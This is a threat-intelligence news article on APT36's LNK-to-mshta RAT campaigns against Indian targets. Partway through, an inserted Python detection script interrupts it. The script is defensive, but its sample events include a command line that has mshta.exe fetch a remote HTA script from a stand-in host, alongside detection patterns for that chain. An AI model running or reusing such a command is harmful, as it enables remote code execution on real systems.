Transparent Tribe Launches New RAT Attacks Against Indian Government and Academia

The cyber threat group Transparent Tribe has launched a series of new attacks targeting various Indian governmental, academic, and strategic entities using a remote access trojan (RAT) to gain persistent control over compromised systems.

According to a technical report by CYFIRMA, the campaign relies on deceptive delivery methods, including a weaponized Windows shortcut (LNK) file disguised as a legitimate PDF document; the lure embeds full PDF content so that the victim sees nothing suspicious when opening it.

Transparent Tribe, also known as APT36, is a state-sponsored hacking group known for conducting cyber espionage campaigns against Indian organizations since at least 2013.

The group utilizes a range of RATs in its attacks, including CapraRAT, Crimson RAT, ElizaRAT, and DeskRAT.

The recent attacks began with a spear-phishing email containing a ZIP archive with a disguised LNK file. When opened, the file triggers the execution of a remote HTML Application (HTA) script using “mshta.exe” to decrypt and load the final RAT payload into memory.
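A defender-side check for the LNK-to-mshta.exe chain described above: it scans process-creation records for mshta.exe launched with a remote HTA URL and for shortcut files whose name carries a document extension before ".lnk". This is an added example, not code from the article or the CYFIRMA report; the events, hostnames and file names are constructed for the demonstration, and the record layout (image, parent, cmdline) assumes a Sysmon-style process-creation event.

```python
"""Triage process-creation events for the LNK -> mshta.exe -> remote HTA pattern.

Added example; the log lines below are constructed, not real telemetry.
"""
import re

# Constructed Sysmon-style process-creation events (not from the report).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    # Remote HTA pulled by mshta.exe after a user double-clicks a shortcut.
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe http://example.invalid/update.hta"},
    # Local HTA run by an installer: not flagged, no remote fetch.
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    # Shortcut whose display name imitates a PDF (double extension).
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c start "" "C:\Users\u\Downloads\Advisory.pdf.lnk"'},
]

# Any URL scheme on the command line means the HTA is fetched from outside.
REMOTE_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# A document extension immediately followed by .lnk is the classic disguise.
DOUBLE_EXT_RE = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?)\.lnk\b", re.IGNORECASE)


def is_remote_mshta(ev):
    """mshta.exe whose command line references a remote HTA."""
    image = ev["image"].lower()
    return image.endswith("\\mshta.exe") and bool(REMOTE_RE.search(ev["cmdline"]))


def is_disguised_lnk(ev):
    """Shortcut file named to look like an office/PDF document."""
    return bool(DOUBLE_EXT_RE.search(ev["cmdline"]))


def score_event(ev):
    """Return the list of finding tags that apply to one event."""
    findings = []
    if is_remote_mshta(ev):
        findings.append("mshta_remote_hta")
        # mshta spawned directly by the shell points at a user-opened lure.
        if ev["parent"].lower().endswith("\\explorer.exe"):
            findings.append("user_launched")
    if is_disguised_lnk(ev):
        findings.append("lnk_double_extension")
    return findings


def triage(events):
    """Return (index, findings) for every event that raised at least one tag."""
    hits = []
    for i, ev in enumerate(events):
        tags = score_event(ev)
        if tags:
            hits.append((i, tags))
    return hits


if __name__ == "__main__":
    for idx, tags in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], "->", ", ".join(tags))
```

The local-HTA event is deliberately left unflagged: mshta.exe itself is a legitimate Windows binary, so the useful signal is the combination of a remote URL on its command line and a shell parent, not the process name alone.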

The malware is designed to adapt its persistence method based on the antivirus solutions detected on the infected system, ensuring successful deployment.

The payload deployed in these attacks, a DLL named “iinneldc.dll,” functions as a full-featured RAT with capabilities for remote system control, file management, data exfiltration, screenshot capture, clipboard manipulation, and process control.

APT36 continues to pose a persistent threat to Indian government entities, educational institutions, and other strategic sectors with a focus on intelligence collection.

In a separate campaign, APT36 has been linked to the distribution of a malicious shortcut file disguised as a government advisory PDF, which leads to the installation of a .NET-based loader for remote command execution and system reconnaissance.

The malware leverages various techniques to establish persistence, communicate with command-and-control servers, and evade detection.

Connection to Patchwork and StreamSpy Trojan

Recently, the hacking group Patchwork, also known as Dropping Elephant or Maha Grass, has been associated with attacks targeting Pakistan’s defense sector using a Python-based backdoor distributed via phishing emails.

The group has also been linked to the StreamSpy Trojan, which utilizes WebSocket and HTTP protocols for command-and-control communication. The trojan shares similarities with the Spyder variant of the WarHawk backdoor attributed to SideWinder.

The malware distributed by Patchwork can harvest system information, establish persistence, communicate with C2 servers, and execute various commands.

The emergence of StreamSpy and Spyder variants from Patchwork indicates ongoing development of attack tools by the group.

Overall, the evolving tactics and tools used by Transparent Tribe and Patchwork highlight the continuous threat posed by these cyber espionage groups to organizations in the region.